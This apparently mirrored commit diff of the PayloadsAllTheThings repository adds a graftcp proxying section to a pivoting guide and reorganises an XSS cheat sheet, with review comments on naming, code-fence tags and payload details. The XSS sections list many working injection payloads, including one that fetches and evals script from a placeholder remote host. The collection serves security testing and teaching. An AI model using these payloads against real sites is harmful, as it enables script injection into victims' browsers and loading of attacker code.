mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
XSS summary subentries + GraphTCP
This commit is contained in:
parent
94f6e31905
commit
dd40ddd233
@ -8,6 +8,7 @@
|
|||||||
* [Local Port Forwarding](#local-port-forwarding)
|
* [Local Port Forwarding](#local-port-forwarding)
|
||||||
* [Remote Port Forwarding](#remote-port-forwarding)
|
* [Remote Port Forwarding](#remote-port-forwarding)
|
||||||
* [Proxychains](#proxychains)
|
* [Proxychains](#proxychains)
|
||||||
|
* [Graphtcp](#graphtcp)
|
||||||
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [sshuttle](#sshuttle)
|
* [sshuttle](#sshuttle)
|
||||||
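Review bot: the new TOC entry `* [Graphtcp](#graphtcp)` misspells the tool. The project is graftcp (`github.com/hmgle/graftcp`, with binaries `graftcp` and `graftcp-local`, as the body of this same commit shows), so the entry and the heading it points at should read `* [Graftcp](#graftcp)` and `## Graftcp`; otherwise anyone searching the README for the real name misses the section.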
@ -80,6 +81,17 @@ socks4 localhost 8080
|
|||||||
|
|
||||||
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
|
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
|
||||||
|
|
||||||
|
## Graphtcp
|
||||||
|
|
||||||
|
Same as proxychains, with another mechanism to "proxify" which allow Go applications.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/hmgle/graftcp.git
|
||||||
|
cd graftcp && make
|
||||||
|
graftcp-local/graftcp-local
|
||||||
|
./graftcp chromium-browser
|
||||||
|
```
|
||||||
|
|
||||||
## Web SOCKS - reGeorg
|
## Web SOCKS - reGeorg
|
||||||
|
|
||||||
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
|
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
|
||||||
|
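Review bot: `## Graphtcp` should be `## Graftcp` to match the clone URL and the binaries invoked two lines later, and the sentence "with another mechanism to "proxify" which allow Go applications" should say what the mechanism is: graftcp hooks connect() through ptrace instead of LD_PRELOAD, which is why it works on statically linked Go binaries that proxychains cannot hook (grammar: "which allows"). The fence is tagged `powershell` but `make` and `./graftcp` are Linux commands, so tag it `bash`. `graftcp-local/graftcp-local` runs in the foreground, so it has to be backgrounded (`graftcp-local/graftcp-local &`) or started in a second terminal before `./graftcp ...` is reachable, and it expects a SOCKS5 server (default 127.0.0.1:1080), which does not match the `socks4 localhost 8080` proxychains setting in the surrounding context; show the `-socks5` argument explicitly. Finally `chromium-browser` is not a Go program, so if the selling point is Go support the example should run a Go binary.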
BIN
SQL Injection/Images/Unicode_SQL_injection.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 517 KiB |
@ -11,6 +11,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Other ways](#other-ways)
|
- [Other ways](#other-ways)
|
||||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||||
|
- [Common Payloads](#common-payloads)
|
||||||
|
- [XSS using HTML5 tags](#xss-using-html5-tags)
|
||||||
|
- [XSS using a remote JS](#xss-using-a-remote-js)
|
||||||
|
- [XSS in hidden input](#xss-in-hidden-input)
|
||||||
|
- [DOM based XSS](#dom-based-xss)
|
||||||
|
- [XSS in JS Context](#xss-in-js-context)
|
||||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||||
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
||||||
- [XSS in PostMessage](#xss-in-postmessage)
|
- [XSS in PostMessage](#xss-in-postmessage)
|
||||||
@ -119,16 +125,16 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
|
|||||||
|
|
||||||
## XSS in HTML/Applications
|
## XSS in HTML/Applications
|
||||||
|
|
||||||
XSS Basic
|
### Common Payloads
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
Basic payload
|
// Basic payload
|
||||||
<script>alert('XSS')</script>
|
<script>alert('XSS')</script>
|
||||||
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
||||||
"><script>alert('XSS')</script>
|
"><script>alert('XSS')</script>
|
||||||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||||||
|
|
||||||
Img payload
|
// Img payload
|
||||||
<img src=x onerror=alert('XSS');>
|
<img src=x onerror=alert('XSS');>
|
||||||
<img src=x onerror=alert('XSS')//
|
<img src=x onerror=alert('XSS')//
|
||||||
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||||
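Review bot: `// Basic payload` and `// Img payload` are JavaScript comment syntax, but every other line in this block is HTML markup and the fence is tagged ```javascript; if the block is later retagged `html` (as the remote-JS block in this same commit is) the `//` lines turn into literal text. Pick one convention for all payload blocks in this file, e.g. ```html with `<!-- Basic payload -->`, so the labels survive whichever highlighter renders them.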
@ -137,7 +143,7 @@ Img payload
|
|||||||
"><img src=x onerror=alert('XSS');>
|
"><img src=x onerror=alert('XSS');>
|
||||||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||||
|
|
||||||
Svg payload
|
// Svg payload
|
||||||
<svgonload=alert(1)>
|
<svgonload=alert(1)>
|
||||||
<svg/onload=alert('XSS')>
|
<svg/onload=alert('XSS')>
|
||||||
<svg onload=alert(1)//
|
<svg onload=alert(1)//
|
||||||
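Review bot: `<svgonload=alert(1)>` on the first svg line (unchanged context directly under the relabelled `// Svg payload` line) is missing the space before `onload` and never fires; since this hunk already touches the line above it, fix it to `<svg onload=alert(1)>` here. The `// Svg payload` label itself has the same problem as the other relabelled headings in this file: a JS comment inside a list of HTML payloads.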
@ -147,7 +153,7 @@ Svg payload
|
|||||||
"><svg/onload=alert(/XSS/)
|
"><svg/onload=alert(/XSS/)
|
||||||
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||||
|
|
||||||
Div payload
|
// Div payload
|
||||||
<div onpointerover="alert(45)">MOVE HERE</div>
|
<div onpointerover="alert(45)">MOVE HERE</div>
|
||||||
<div onpointerdown="alert(45)">MOVE HERE</div>
|
<div onpointerdown="alert(45)">MOVE HERE</div>
|
||||||
<div onpointerenter="alert(45)">MOVE HERE</div>
|
<div onpointerenter="alert(45)">MOVE HERE</div>
|
||||||
@ -157,7 +163,7 @@ Div payload
|
|||||||
<div onpointerup="alert(45)">MOVE HERE</div>
|
<div onpointerup="alert(45)">MOVE HERE</div>
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS for HTML5
|
### XSS using HTML5 tags
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<body onload=alert(/XSS/.source)>
|
<body onload=alert(/XSS/.source)>
|
||||||
@ -178,40 +184,36 @@ XSS for HTML5
|
|||||||
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS using script tag (external payload)
|
### XSS using a remote JS
|
||||||
|
|
||||||
```javascript
|
```html
|
||||||
|
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
|
||||||
<script src=14.rs>
|
<script src=14.rs>
|
||||||
you can also specify an arbitratry payload with 14.rs/#payload
|
// you can also specify an arbitrary payload with 14.rs/#payload
|
||||||
e.g: 14.rs/#alert(document.domain)
|
e.g: 14.rs/#alert(document.domain)
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in Hidden input
|
### XSS in hidden input
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
DOM XSS
|
### DOM based XSS
|
||||||
|
|
||||||
|
Based on a DOM XSS sink.
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
#"><img src=/ onerror=alert(2)>
|
#"><img src=/ onerror=alert(2)>
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
### XSS in JS Context
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
-(confirm)(document.domain)//
|
-(confirm)(document.domain)//
|
||||||
; alert(1);//
|
; alert(1);//
|
||||||
```
|
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
|
||||||
XSS URL
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
URL/<svg onload=alert(1)>
|
|
||||||
URL/<script>alert('XSS');//
|
|
||||||
URL/<input autofocus onfocus=alert(1)>
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## XSS in wrappers javascript and data URI
|
## XSS in wrappers javascript and data URI
|
||||||
|
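Review bot: the `XSS URL` block (`URL/<svg onload=alert(1)>`, `URL/<script>alert('XSS');//`, `URL/<input autofocus onfocus=alert(1)>`) is deleted in this hunk and not re-added under any of the new subsections, which the commit message ("XSS summary subentries") does not announce; either keep it as a `### XSS in URL` subentry or say the removal is intended. On the new `<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>` payload: a cross-origin `fetch` only yields `r.text()` when the attacker server answers with `Access-Control-Allow-Origin`, so note that the host must send CORS headers (a plain `<script src=...>` does not need them), and mark `host` as a placeholder. The `// you can also specify ...` and `e.g: ...` lines now sit inside a block tagged ```html, where `//` is not a comment. `Based on a DOM XSS sink.` under `### DOM based XSS` does not say which sink the `#"><img src=/ onerror=alert(2)>` payload targets (e.g. `location.hash` written via `innerHTML`); name it. Lastly `// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)` is missing its closing parenthesis.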